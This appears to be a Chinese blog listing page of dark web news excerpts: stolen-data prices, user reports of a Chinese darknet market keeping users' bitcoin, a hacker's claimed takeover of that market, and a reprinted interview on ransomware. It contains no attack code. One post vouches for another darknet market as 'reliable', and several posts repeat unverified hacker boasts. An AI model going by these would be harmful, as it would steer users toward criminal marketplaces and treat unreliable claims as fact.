    通货膨胀意味着你必须为面包、燃料或蔬菜支付越来越多的费用,但并不是所有东西都变得更贵。一个有趣的例子是暗网,其中一些商品价格在飞涨,但许多商品在暴跌。2021年,波兰护照在那里要4000美元,但一年后已经便宜了200美元。与此同时,马耳他护照的价值进一步下跌——从6500美元跌至2500美元。 暗网通常被认为是一个在线的电子商务平台,在那里,违禁品的交易蓬勃发展,但事实并非如此。在这个听起来很阴暗的名字下,还有一些匿名网站和论坛,生活在极权国家的人们经常使用这些网站和论坛,在那里表达自己的观点会受到严厉的惩罚。但是,与传统网站不同的是,它们不会导向www地址,人们也不会在Google搜索引擎中找到它们。 不幸的是,暗网是一个除了有正常的互联网用户之外,还是一个吸引了成群结队的骗子、毒贩、黑客和销赃者的地方。网络的阴暗面充斥着盗版电影和电视剧、非法软件许可、假冒的奢侈品、被盗的信用卡资料、PayPal账户和身份证件。 越来越多的互联网用户因攻击而正在失去有价值的数据,在某些情况下,甚至他们的身份遭受攻击。然而,大多数受害者并没有想到被黑客获取的信息后的命运,或者根本不知道盗窃行为已经发生。同时,被盗数据在供应链中流动。与合法商品一样,它由供应商、批发商和消费者组成。 GDATA营销经理Robert Dziemianko说: 犯罪供应链从供应商开始,即黑客接管敏感信息,如信用卡号码、银行账户信息等。接下来,批发商和分销商在暗网运作的在线平台上推广和销售被盗数据。在产业链的末端是消费者,他们最有可能使用这些数据来实施各种类型的欺诈,如完成被盗的信用卡交易或发起网络钓鱼攻击。 数百万美元流入欺诈者的腰包 非法或赃物的交易不仅仅发生在某一个平台上。根据英国犯罪学杂志的研究,暗网上有几千个供应商在暗网中运作,在30个平台上提供数以万计的被盗数据。其中最受欢迎的是Agartha、Apollon、Aurora、DeepMart、White House(已经关闭)或Cartel。在去年的八个月里,专门出售欺诈性商品的卖家通过出售被盗数据赚取了1.4亿美元的收入。 暗网中商品的价格差别很大。例如,余额高达5000美元的信用卡详细信息的费用约为120美元,但在2021年,价格是这个数字的两倍。一个经过验证的Cash App账户(在美国和英国提供的一种支付服务)的价格要高得多,高达800美元。它在黑市上的价值在一年内下降了200美元。订阅价格要便宜得多,Netflix一年的观看费用为25美元,Hulu只需5美元。 Robert Dziemianko说,非法服务供过于求导致价格下跌。 值得注意的是,在大多数情况下,被盗数据的价格正在下降。IT公司裁员、经济放缓、乌克兰战争或加密货币市场大幅波动等现象,让有知识和技能的人开始进入网络犯罪领域以养家糊口。 如何不被动落入暗网 互联网用户不访问这个网络的阴暗面的事实并不意味着他们的数据不会在暗网存在。在绝大多数情况下,从各种类型的网站、社交媒体或在线商店泄露的数据会进入暗网。如果这些数据最终落入犯罪分子手中,受害者的电子邮件收件箱充其量会受到垃圾邮件的轰炸,最坏的情况是账户中的钱被盗走。如何保护自己免受其害? GDATA Software的专家建议您首先遵守网络安全的基本规则。简单而言,保护自己网络安全的常识包括不要通过电话或短信提供机密信息,不要在不同的在线和电子邮件帐户使用相同的密码,不打开来自未知来源的电子邮件等等。 对任何互联网用户来说,检查他们的数据是否在暗网中被交易是比较容易的。有一些专门的工具,如Firefox Monitor。如果有一个与电子邮件地址相关的数据泄漏,受影响的人将会收到关于泄漏源和数据出现在暗网中的日期的信息。一些安全软件供应商提供数字身份保护服务,包括监控客户数据是否存在于暗网中。...

    2023-05-01 值得一看 45
  • 针对“暗网中文论坛”的举报一:曝光垃圾“中暗”

    “Kirin博客”曝光“暗网中文论坛”倾吞客户资产的事件在业内引起了强烈的反响,先是有牛逼黑客为大家声张了正义,再有知名暗网导航“onion666暗网导航”已经将该“暗网中文论坛”标记为“确认诈骗”。近期,在“Kirin博客”的征集号召下,又有多名受害网友向本站进行了投诉举报。本文将公布针对“暗网中文论坛”的举报一:曝光垃圾“中暗”,举报人为匿名网友“ann”。 “暗网中文论坛”又名“中文暗网交易市场”,因此老用户称其为“暗中”,新用户称其为“中暗”,都代表这一暗网诈骗网站。 匿名网友“ann”是今年3月份才接触到“中暗”,算该交易市场上的一名比较新的会员,但没想到刚来就遇到了黑币的事件。 “ann”称注册后在该市场成功成交了一些商品,账户里的结算货款资金大概价值500U左右。与很多网友称的提币被冻结账号、提币被修改密码的经历一样,当他选择提币的时候,密码就被“黑”了,他判断也应该是被“中暗”的诈骗管理员(特指其站长)直接修改了,因为太巧了,之前使用密码都没问题,一提币密码就不正确。 “ann”说他在暗网里只上过“中暗”,没有任何飞机群,也没跟其他人说过,账户余额就直接被黑了。 于是“ann”用新建的账号问诈骗管理员:“为什么账号登不上去?”诈骗管理员居然称“账户被盗与一个叫长安不夜城的诈骗网站有关”,然后假惺惺帮他找回了密码,但是资金已经被锁定,也就是不允许任何资金操作,说白了不给提币了。 然后到了昨天,“ann”把所有帖子下架并移到“长安不夜城”,诈骗管理员估计看到他把帖子发到了“长安不夜城”,再次直接了“ann”的登录密码和支付密码,导致他再次无法登录。 但是由于之前诈骗管理员帮忙重置密码的时候设置过“恢复密码”,这个“恢复密码”是由诈骗管理员帮忙设置的,任何人无法修改也没有地方可以修改这个“恢复密码”。于是“ann”用“恢复密码”再次找回了登录密码,登录上去,看到币已经被提了。 搞笑的是,“ann”自己提币,就显示账号风险,不允许提币。试问除了诈骗管理员,谁还可以提币,也就是诈骗管理员为了合情合理地把币清0,所以直接后台提币了。 还有一点,诈骗管理员改了“ann”的“交易密码”,查看提币是要“交易密码”的,理论上“ann”可以用“恢复密码”去重新修改交易密码,这时候牛逼的事情来了,只要“ann”修改“交易密码”,诈骗系统会不断提出要验证“恢复密码”,但只要点击,就又会刷新到输入“恢复密码”的阶段。 “ann”表示,这个诈骗管理员,为了费尽心思搞用户的钱,又害怕别人曝光他,又想把用户账号的资金清0,于是在其网站上面经常出现一些语句,恐吓用户,洗脑用户进来网站交易。但没想到到最后最大的诈骗犯、收割者居然是他自己。 “ann”还觉得,估计这个诈骗管理员不是大陆人,语气还有思维方式不太像,而且也能解释“十年不倒”其实他就是身处境外,所以大陆警方才抓不到他。 “Kirin博客”倒不这么认为,越是刻意伪装越有可能他就在境内,只是警方目前还没把他作为重点关注对象而已。如果谁有关于该诈骗管理员的线索,请提供给“Kirin博客”,本站将酌情向中国公安举报,力争将该暗网交易市场开办者、诈骗分子绳之于法。...

    2023-04-27 值得一看 75
  • 4月26日新闻早讯,每天60秒读懂世界

    4月26日,农历润三月初七,星期三 在这里,每天60秒读懂世界 1、外交部:自4月29日起,所有来华人员可以登机前48小时内抗原检测代替核酸检测,航空公司不再查验登机前检测证明; 2、解放军新型战机"歼-35"疑曝光,台学者:未来或推出垂直起降技术的改进型号,将助大陆两栖攻击舰成"准航母"; 3、原黑龙江佳木斯向阳区某中学教师请病假25年未返岗,退休前发现编制"消失",起诉学校要求恢复编制并补发工资90万,法院一审驳回其诉求,目前其已进行上诉; 4、自然资源部:我国全面实现不动产统一登记,累计颁发不动产权证书近8亿本。专家:不能简单理解为要开征房地产税; 5、24日,江苏淮安一居民楼发生火灾,妈妈将两孩子从3楼扔下求生,相关部门:孩子没事,妈妈摔到头已去世; 6、上海杭州之间或建世界首条超级高铁:速度高达1000公里/小时,仅9分钟车程; 7、台媒:台湾彰化县北斗镇的联华食品彰化工厂25日发生火灾,已造成7死8重伤7轻伤。初步判断事故起因为生产线意外; 8、当地24日,巴基斯坦西北部一警察局的军火库遭爆炸袭击,造成至少13死50多伤; 9、美国第一共和银行一季度存款下降40.8%至1045亿美元,预计第二季度将裁员约20%至25%; 10、当地25日,拜登正式宣布将再次竞选总统,民调显示:大多数美国受访者既不想要拜登,也不想要特朗普参选。美媒:明年可能是"最无聊总统初选"; 11、世卫:苏丹武装冲突已致至少459人死亡。在冲突中,一方控制了存放小儿麻痹症和麻疹等疾病样本的实验室,致"极其危险"局面; 12、日媒:福岛第一核电站2号机组池内燃料棒取出作业2025年度启动。东电公司25日宣布核污染水排海隧道挖掘完成; 13、土耳其国防部:土俄伊叙举行四方会谈讨论土叙关系正常化等问题;英媒:美国提议G7成员国全面禁止对俄出口,欧盟和日本提出反对称"根本行不通"; 14、外媒:由于美国的所作所为,俄罗斯或退出暂停部署中程和中短程导弹的条约;外媒:瑞典称驱逐5名俄罗斯外交官,理由是从事"与其身份不符的活动"; 15、俄媒:俄最先进坦克T-14"阿玛塔"已开始在乌执行任务,是世界上第一款现役第四代坦克,采用了无人炮塔并配备主动防御系统,将大幅降低乘组人员伤亡率; 【微语】不去追逐,永远不会拥有。不往前走,永远原地停留。...

    2023-04-26 值得一看 44
  • 重磅!独家!曾经最大的中文暗网市场“暗网中文论坛”确认倾吞用户资产,请勿充值,请勿使用!

    上周,“Kirin博客”曾报道“暗网中文论坛”发布公告宣称“长安不夜城”盗取其用户密码,原来这只是该老牌市场为了倾吞用户资产而预埋的伏笔。近日,多名用户向Kirin博客举报称,“暗网中文论坛”管理员以多种理由拒绝提币,数个比特币无法从该平台提出。 “暗网中文论坛”,现也自称为”暗网中文交易市场“,业内称为”暗中“或者”中暗“,证明了早期在中文暗网圈是有相当大的认可度的。根据网友们的反馈,该暗网网站作为开办运营比较早的中文暗网交易平台,早期确实比较讲信誉,哪怕其间有受到攻击无法正常访问,至少一直在稳定延续运营。 但是,好景不长,估计早在2018年、2019年左右,这个号称“运行十年”的也是曾经自称“最大”的老牌中文暗网交易市场,就开始变质并自甘堕落了。也就是这已经不是第一次收割用户了,据称当年用户名改编号的时候已经收割过一茬,2021年、2022年曾经有多位用户在”onion666暗网导航“关于“暗网中文论坛”的介绍下评论道”这个网站明面上不跑路,但是你钱够提现了就会跳你毛病,别去“、”大额资金提现会被封号“,这么多用户的反馈,包括部分截图,确认其倾吞用户资产属实,也意味着近几年来,“暗网中文论坛”的站长(管理员)一直在割韭菜一样的收割用户,保守估计有价值几百万的用户比特币资产被倾吞。 以下是用户”*陈“举报的部分留言: 听说”中文暗网“现在站长自导自演,冻结了大批的账号,然后黑币;我好几个客户的账号都被冻结了,里面的币也没了”中文暗网“站长说是因为点了钓鱼链接,我好多客户从来没有点过钓鱼链接,就这样号被冻结了我有个客户就是搞网络安全的,他那个电脑专门上暗网,从来不干别的,结果也是,突然密码错误,然后被冻结提交申请七天了,第一次被驳回了,问了管理说是我账号暂停提现,说是我的账号也有风险, 然后第二次提现,一直没提出然后问了十几个客户和同行,都没提出来前年搞账户改ID那会已经被坑了一次了,今年又一次….我一直问管理,之前还回复呢,说让等,后来再也不理人了前几天”中暗“还有人发帖子说是,管理自导自演黑币跑路,结果被删了帖子 用户”*陈“准备提币2.72个比特币: “暗网中文论坛”的管理员拒绝提币的理由是(你的账号现在有风险,暂停提现,等待风险期过后吧): 用户与”诈骗管理员”的沟通: 用户发布帖子揭露“暗中”自导自演进行黑币(帖子已经被删): 后又有网友称,”长安不夜城“官方群组里有”暗中“受害者几天前就提示了,名为c\*\*i的网友在群里说: 提醒大家!如果谁还在暗网中文交易市场有钱,马上提出来!还抱有侥幸心理的自己等着看,我就是最好的例子。草他妈,各种理由改你密码,你还无法找回,而且造谣说不夜城管理已经被抓!我最开始就是抱有侥幸心理。他会马上改你密码,让你无法登录找回。前几年通过改用户用户名让其他人无法登录,现在改密码以各种理由说你被不夜城种马了不给登录!老子每天发一遍,我知道暗网中文交易市场有人在这个群里!可能现在不会改你密码,当你余额达到1000U以上时,你就知道了,可能你现在有1000U没有被改,只是他可能还没出手,一次性改太多怕引起用户反弹,流失赶快跑路 赶快跑路。也许你从现在开始就无法提现了。百分之百真之前他发的说明 什么密码被改的去他界面改 那完全是放屁不要抱有侥幸的心理以后再也不会去那个狗币网站去了主要是他妈的改了密码还给你说 是不夜城给你电脑种马了他不是一次性跑路 他是渐渐的跑路而且网站不关 直接改你密码 所有问题 你有办法?现在等于说你充钱进去 可能就是肉包子打狗我说的不是不夜城,不是不夜城,不是不夜城!!!! 我说的是暗网中文交易市场!!!!! 以上两个留言深入说明了“暗网中文论坛”保持网站一直在线并持续性收割用户的本质,希望所有访问暗网的网友好自为之,远离“暗网中文论坛”(暗网中文交易市场)。不要再访问!不要再访问!不要再访问! 至于”长安不夜城“,现在看至少是可靠的且大家都认可信服的;但是目前靠谱不代表永远靠谱,因为暗网里的”退出骗局“、”警方打击“太多了。如果要安全,不被骗,“Kirin博客”希望所有网友遵纪守法,远离暗网!...

    2023-04-26 值得一看 86
  • 快讯:“暗网中文论坛”被黑,黑客随便进入后台

    “Kirin博客”前天正式确认“暗网中文论坛”倾吞客户资产,并做出了迅速预警,也及时通知了“onion666导航”,但目前“onion666导航”尚未更新该暗网网站的属性。 今天,有黑客在Telegram群组中表示,只花了两天两夜,“暗网中文论坛”已经被他黑掉,并且发布了“暗网中文论坛”的后台截图: 截图显示,登陆的账号确为编号10000的管理账户。该黑客表示,“暗网中文论坛”(黑客称该论坛为“中暗”)黑了他的币,惹到他了,只要该论坛在售的帖子,想要什么,他可以提供链接。并且他在首页置顶处发布了主题:“很遗憾,中暗被我黑掉了!!!”: > 主题编号: 6524 发布人: 10000 时间: 2023-04-24 02:24 > 很遗憾,中暗被我黑掉了!!! > 原因也很简单,小小中暗竟然黑我的币,冻结我的账户 > > 重点。我目前只黑了中暗服务器,中暗的资金管理都在管理员本地的电脑上进行,所以大家的资金我没动 > 不过,我猜,管理肯定会借这个机会和大家说,大家的币没了呵呵哈哈哈 > > 垃圾中暗 不要用了 > > 需要中暗什么数据的直接甩给我交易ID 我把发货下载地址发给你们 目前该主题已经被真正的管理员删除。 “Kirin博客”第一时间联系采访该黑客,黑客表示他这次的渗透,点到为止,用户的数据、服务器的数据,他一点也没动。黑客称,他就是想在“中暗”(“暗网中文论坛”)每个月搞点茶钱而已,本不想搞事,结果站长黑他的币,还冻结他的账户,找站长理论还比较狂妄,他很无奈,只能黑了这个站。黑客说他本不想惹事的,都是该站长逼的。 黑客称,Tor的漏洞、钓鱼节点,他这里掌握了很多,只要是人做得东西就会有漏洞;公安部早就掌握了很多漏洞,包括Tg手机端的,Tg可以直接获取对方IP和位置,如果设置不好手机号直接暴露。 黑客说,“中暗”这个网站本身在他眼里就是垃圾,只不过用的人多而已,前期用的phpbb框架,后面是站长他们自己改的系统,漏洞一大堆,服务器也被他拿下来了。 黑客还表示,很可惜的是,资金提币是用户提交申请,站长看到后,在本地自己的电脑钱包上进行转账,转了以后再把tx复制到暗网用户提交的申请上,再点一个同意。也就是所有提币都是手动的,也没有混币一说,所谓的混币不过是生成几万个地址互转过滤一遍而已。也就意味着,用户的资金在数据库只是个数字而已,最终的资金还在管理本地的电脑上btc钱包里,所以黑客找不回自己的资金。 可以看出,这个黑客技术很高,“暗网中文论坛”站长黑了他几十万的币,这才出手。暗网中没有诚信,都是犯罪。  ...

    2023-04-26 值得一看 60
  • 世界各国钱币图片应该有帮助吧!

      世界各国钱币 图片 https://pan.quark.cn/s/bee63a83be64...

    2023-04-26 值得一看 56
  • 我做了30年的黑客,这些是我在暗网上看到的最可怕的东西

    一位经验丰富的网络罪犯揭示了暗网上的真实情况——黑客、杀手和毒贩在这里肆意妄为。 这位匿名的消息人士解释了黑客如何使用勒索软件窃取数据以获得巨额报酬,或者“只是为了看到世界在燃烧”,并解释说任何连接到网络的系统都有遭受攻击的风险。 “我看到医院被加密,人们不得不做出选择:我是花钱解密数据,还是冒着生命危险?”男子边说边戴上了口罩以掩饰身份。 暗网是一个让人无法追踪的网上活动场所,具有高度的隐私性。最近的一份报告发现,最受欢迎的内容是儿童色情内容,其次是枪支和毒品。 虽然黑客没有触及这些非法活动,但他担心“[勒索软件将]对金融市场产生重大影响,或对电力生产设施等产生潜在影响。” 英国军事情报部门的退休上校菲利普·英格拉姆(Philip Ingram)去年表示:“暗网越来越多地被严重和有组织的犯罪分子用于各种目的。“ “他们寻找孩子们的弱点,培养他们做一些事情,比如沿着县级路线经营毒品,在恋童癖团伙中进行剥削,或者被恐怖主义和极端主义团体招募。” 有几个平台提供对暗网的访问,包括i2p、FreeNet和Tor。 Tor——洋葱路由器(The Onion Router)的简称——是一个由加密网站组成的矩阵,允许用户以完全匿名的方式在日常互联网下冲浪。 它使用多层安全和加密来使用户保持在线匿名。 一项研究估计,每天大约有260万Tor用户在暗网里冲浪。 澳大利亚国立大学的研究人员写道:“同一项研究发现,从单一的数据采集中发现,大约80%的洋葱服务流量被定向到确实提供非法色情、虐待图片和/或儿童性虐待材料的服务。” 这段黑客采访是由Vice在2021年进行的,但这段视频最近再次浮出水面,提醒人们有一个黑暗的世界,他们的唯一目标是利用互联网造成破坏。 这名男子以黑帽身份开始了他的黑客生涯,这是一种不遵守法律并为自己的目的进行攻击的网络犯罪。 此后,他翻开了新的一页,成为了一名白帽子,他利用自己的技能做好事,在网上追踪罪犯,寻找系统中的漏洞来修复它们,而不是利用它们。 “如果我想进入一家安全的公司,我不会去踢门。”他在采访开始时说。 “我会把目标放在我认识的有权限的人身上,我知道他们把个人设备带进大楼,或者做与敏感物品相邻的事情,然后我就会想办法上去。” 第一个勒索软件攻击是由约瑟夫·波普(Joseph Popp)于1989年编写的,用于针对医疗保健行业。 这种称为艾滋病木马(AIDS Trojan)的攻击是由Popp向世界卫生组织艾滋病会议的与会者分发2万个受感染的磁盘而完成的。 这些磁盘被标记为“艾滋病信息——介绍磁盘”。 当磁盘文件被下载到计算机上时,屏幕上会出现一个巨大的图像,上面写着该软件会“对其他程序应用程序产生不利影响,你将欠PC Cyborg公司赔偿和可能的损失,你的微型计算机将停止正常运行。” 该程序会计算计算机启动的次数,一旦达到90次,它就会隐藏目录并对C盘上的文件名进行加密或锁定。 为了重新获得访问权限,用户必须通过巴拿马的一个邮政信箱向PC Cyborg公司发送189美元。 此后,勒索软件已经发展到黑客不需要离开他们家的地方——一切都可以在暗网上完成。 “在过去,一个国家要对像美国这样大的国家造成破坏,你需要数百万美元的投资才能做某事,”该男子告诉Vice。 “今天,你只需要几千美元、一台笔记本电脑和几个聪明的黑客,就可以编写一些代码并发送出去。” 凯文·米特尼克(Kevin Mitnick)因在1995年攻击40家主要公司(包括IBM、诺基亚和摩托罗拉)而被认为是“世界上最著名的黑客”。 他窃取了计算机代码,有人估计这些代码花费了近3.3亿美元,并在监狱中度过了5年。 米特尼克在2000年获释后表示,他已经“改过自新”,现在以白帽子的身份生活——一名有道德的安全黑客。 与Vice交谈的人声称也是从事此类工作。 “我曾经认为自己是黑帽子,后来变成了白帽子,”这名男子说,长长的灰色胡须从面具下流淌出来。 “白帽子往往是受道德准则约束的黑客,他们试图做改善大局的事情,并受法律约束。” 但他过去的不当操作使他陷入了暗网的邪恶行为之中。 他解释说,虽然像俄罗斯这样的大国通常会在勒索软件攻击中被点名,但“每个国家都有理由将这些类型的攻击武器化。” 而正是那些在雷达下飞行的小国家正在充分利用。 他声称每个西方国家都去暗网寻求“社区”的帮助。 众所周知,即使是高级官员也不知道哪些系统在被黑客加密时最脆弱,最“受伤”。 这一点在2021年的Colonial Pipeline勒索软件攻击中得到了明确体现,该攻击由DarkSide黑客组织精心策划,并关闭了整个管道系统。 这次网络攻击中断了从德克萨斯州到新泽西州的铁路沿线每天250万桶燃料的运输。 官员们将其称为历史上对美国能源基础设施最具破坏性的网络攻击。 联邦调查局将这次袭击的幕后黑手命名为DarkSide。据报道,Colonial屈服于黑客的要求,支付了500万美元的赎金,以换取恢复服务器访问的解密密钥。 这位白帽黑客谈到了初始访问的代理市场,这是向网络犯罪分子出售企业网络访问权的威胁行为者。 “这些所谓的初始访问代理(IAB)以平均约2800美元的价格出售了被盗的VPN和远程桌面协议(RDP)帐户详细信息以及其他凭证,犯罪分子可以利用这些凭证侵入全球2300多个组织的网络世界,毫不费力。”Dark Reading报道称。 自Vice视频以来,初始访问代理市场出现了业务繁荣。 网络安全研究人员报告称,在2021年下半年至2022年上半年之间,IAB销售活动发生了2348次,经纪人的数量也从262人增加到380人。 据InfoSecurity Magazine报道,在报告期内,约有2886家公司的敏感数据被公布在勒索软件泄露网站上,比前一年增加了22%。 联邦调查局对这种非法活动并非视而不见,而是一直在努力抓捕大的参与者。 该机构现在正在寻找这些网站的运营商和用户。 联邦调查局一名高级官员本月在谈到该机构取缔大型在线暗网市场Genesis Market时说,我们不仅试图攻击供应方,而且还试图攻击用户的需求方。 “如果你打算使用这些类型的网站从事此类犯罪活动,就会产生后果。” 以FBI为首的国际执法机构查获了一个深受网络犯罪分子欢迎的庞大暗网市场,其中被盗密码的售价低至每个1美元。 被称为Genesis Market的黑客网络集市在名为“Operation Cookie Monster”的跨国打击行动中被查获,此前该网站专门出售被盗的数字指纹,即cookie信息。 据联邦调查局称,Genesis Market提供了从全球150多万台被攻击的计算机上窃取的数据,其中包含8000多万个账户访问凭证。 被盗数据包括网上银行、Facebook、亚马逊、PayPal和Netflix等服务的密码,以及数字指纹,犯罪分子可以利用这些数字指纹通过欺骗受害者的设备来绕过在线安全检查。 英国执法官员说,在全球范围内的协调突击行动中,进行了200多次搜查,逮捕了约120人,其中包括在英国小镇格里姆斯比及其周边地区逮捕的24人。 一名联邦调查局高级官员称,在美国境内也有嫌疑人因这次行动而被捕,但没有提供被捕人数或指控的细节。...

    2023-04-21 值得一看 63
  • 人工智能ai爆文写作课,让ai成为我们的自媒体写作的提升效率

    第一课-写作认知课.mp4 第二课-光速排版.mp4 第三课-选题方向.mp4 第四课-故事龙骨.mp4 第五课-开幕雷击.mp4 第六课-调教技巧.mp4 链接:https://pan.quark.cn/s/339217b3e8a5...

    2023-04-19 值得一看 46
  • 计算出生至今活了多少天引流HTML页面

    引流HTML单页面,选择出生年月日,然后计算出自己从出生至今活了多天。 单页面,下载源码上传自己服务器即可。...

    2023-04-18 值得一看 56

联系我们

在线咨询:点击这里给我发消息

QQ交流群:

工作日:8:00-23:00,节假日休息

扫码关注